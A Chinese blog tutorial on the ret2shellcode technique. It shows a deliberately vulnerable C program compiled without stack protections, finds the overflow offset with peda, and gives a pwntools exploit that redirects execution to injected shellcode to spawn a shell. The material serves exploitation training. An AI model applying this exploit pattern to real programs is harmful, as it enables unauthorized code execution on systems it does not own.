ret2shellcdoe

最新推荐文章于 2024-01-24 17:14:26 发布
最新推荐文章于 2024-01-24 17:14:26 发布
阅读量174 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41683305/article/details/105163761
版权

ret2shellcode的关键是找到一个缓冲区,这个缓冲区是可读写写可执行的,我们要想办法把我们的shellcdoe放到这个缓冲区,然后跳转到我们的shellcode处执行。

例子:

#include <stdio.h>
#include <string.h>
char str1[0x40];

void func()
{
	char str[0x40];
	read(0,str,0x60);
	strcpy(str1,str);
}
int main()
{
	func();
	return 0;
}

可以看出,read处有溢出

编译:

gcc -no-pie -fno-stack-protector -z execstack -m32 -o 6.exe 6.c

找到溢出点:
用peda生成100个字符,
在这里插入图片描述
溢出查看此时的EIP
在这里插入图片描述
溢出点在76
在这里插入图片描述
找到str1首地址
0x804a060
在这里插入图片描述

写出我们的poc

from pwn import *
context(arch="i386",os="linux")
p=process('./6.exe')
offset = 76		
shellcode=asm(shellcraft.sh())		//生成shellcode代码,这里的shellcode越短越好,长度不能超过溢出的长度76
payload =shellcode.ljust(offset,'\x90')+p32(0x804a060)		//ljust是为了让\x90填充我们的shellcode,让其长度达到760x804a060是str1的首地址,目的是为了跳转到str1首地址,去执行我们的shellcode
pid=proc.pidof(p)
print pid
pause()
p.sendline(payload)
p.interactive()

执行,成功获得权限
在这里插入图片描述

注:
生成shellcdoe方法:
方法1.用pwntool或者peda和msfpc或者msfvenom工具生成,支持上线,最好越短越好
例如用pwntool中的shellcraft.sh(),再转汇编字节码asm()
asm(shellcraft.sh()),程序中我们是利用peda生成的。

方法2.手写,其实网上一搜到处都是,可以直接用,但自己要和前段时间windows一样自己调试提取
就是想办法调用evecve("/bin/sh",null,null);

总结
ret2shellcode的本意是我们在程序当中能找到一块缓冲区,这个缓冲区可读可写可执行,然后想各种办法,把我们的shellcode搞进这个缓冲区,然后到这个缓冲区头部去执行。
像上面的例子中,我们利用栈溢出将我们生成的shellcdoe复制到str1处,str1处可读可写可执行,并且在构造payload中加入了这个str1首地址,到这里去执行我们的shellcode

p0inter
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2shellcode
m0_49959202的博客
08-14 164
文章目录ret2shellcode1.保护机制2.ida分析3.exp编写 ret2shellcode shellcode:在栈溢出的攻击技术中通常是要控制函数的返回地址到自己想要的地方执行自己想要执行的代码。ret2shellcode代表返回到shellcode中即控制函数的返回地址到预先设定好的shellcode区域中去执行shellcode代码,这是非常危险的。 1.保护机制 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4UzJhYXX-1628871725391
Ret2ShellCode
钞sir的博客
01-24 8126
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode是栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
Ret2ShellCode详解
Sakura给爷pwn全场
10-24 361
StackOverFlow之Ret2ShellCode详解: https://www.freebuf.com/vuls/179724.html https://www.jianshu.com/p/7dad572adae9
ret2shellcode之战
qq_44119514的博客
04-12 161
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc exploit
07-07
exploit hack linux ret2libc
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
C语言头文件 RETCODE
06-13
C语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言...RETCODEC语言头文件 RETCODEC语言头文件 RETCODEC语言头文件 RET
ret2libc2pwn 入门题
02-11
pwn 入门题
简单的PWN学习-ret2shellcode
weixin_48421613的博客
07-05 812
最近在学习pwn,这是一道2016年的pwn题目,主要学习关于栈溢出以及劫持栈指针达到命令执行的效果,笔者水平较差,请轻喷
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2052
pwn 入门
PWN初体验之ret2shellcode
weixin_43137410的博客
08-07 662
所有的热爱都应该被坚持,人这一辈子太短了,无论如何都要为自己的热爱拼搏一次,就算最后失败了,至少不会后悔!
shell record
09-11 1020
#!/bin/bash for i in `find ./cluster/* -type d` do count=${i##*/} echo $count echo -e '\n' for j in `find $i -type f` do name=${j##*.} echo $name echo -e '\n' cp $j "./one/$count.$name" echo $j ec
Linux Shell Record
weixin_30387423的博客
04-01 150
history :shell历史记录,可以看回之前输入过的命令,调用的话: e.g: history 9man command: 出现命令选项描述ps :查看系统进程 e.g: ps aux | less 可以翻阅出现在屏幕上的所有进程--help :获得有关命令如何使用 e.g: date --help | less type :查找一个命令的位置 e.g: type datevi使用...
【rop emporium 2020】ret2win
^_^
02-06 406
这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道题的学习记录 因为网上都是比较早版本的题解,所以写了这篇博客,不过这道题倒是变化不大。 题目链接:https://ropemporium.com/challenge/ret2win.html 32位 反编译后: int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(_bss_start, 0, 2, 0); puts.
ret2shellcode 学习
最新发布
akdelt的博客
01-24 506
shellcode 之前提了,ret2shellcode是指攻击者需要自己将调用shell的机器码(也称shellcode)注入至内存中,随后利用栈溢出复写return_address,进而使程序跳转至shellcode所在内存。若某个程序的bss段可写且可执行,攻击者就可以尝试将shellcode注入写入全局变量或静态变量中。若某个程序的heap段可写且可执行,攻击者就可以尝试将shellcode注入至动态分配的变量中。在虚拟内存中,data段主要保存的是已经初始化了的全局变量或静态变量。
ret2win Challenge1(x86-64)
u014377094的博客
02-10 320
ret2win 1 x64
高级栈溢出技术—ROP实战(简介及ret2win)
ChuMeng1999的博客
01-07 1253
目录预备知识关于ROP本系列rop实战题目的背景ret2win涉及知识点实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmpori
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值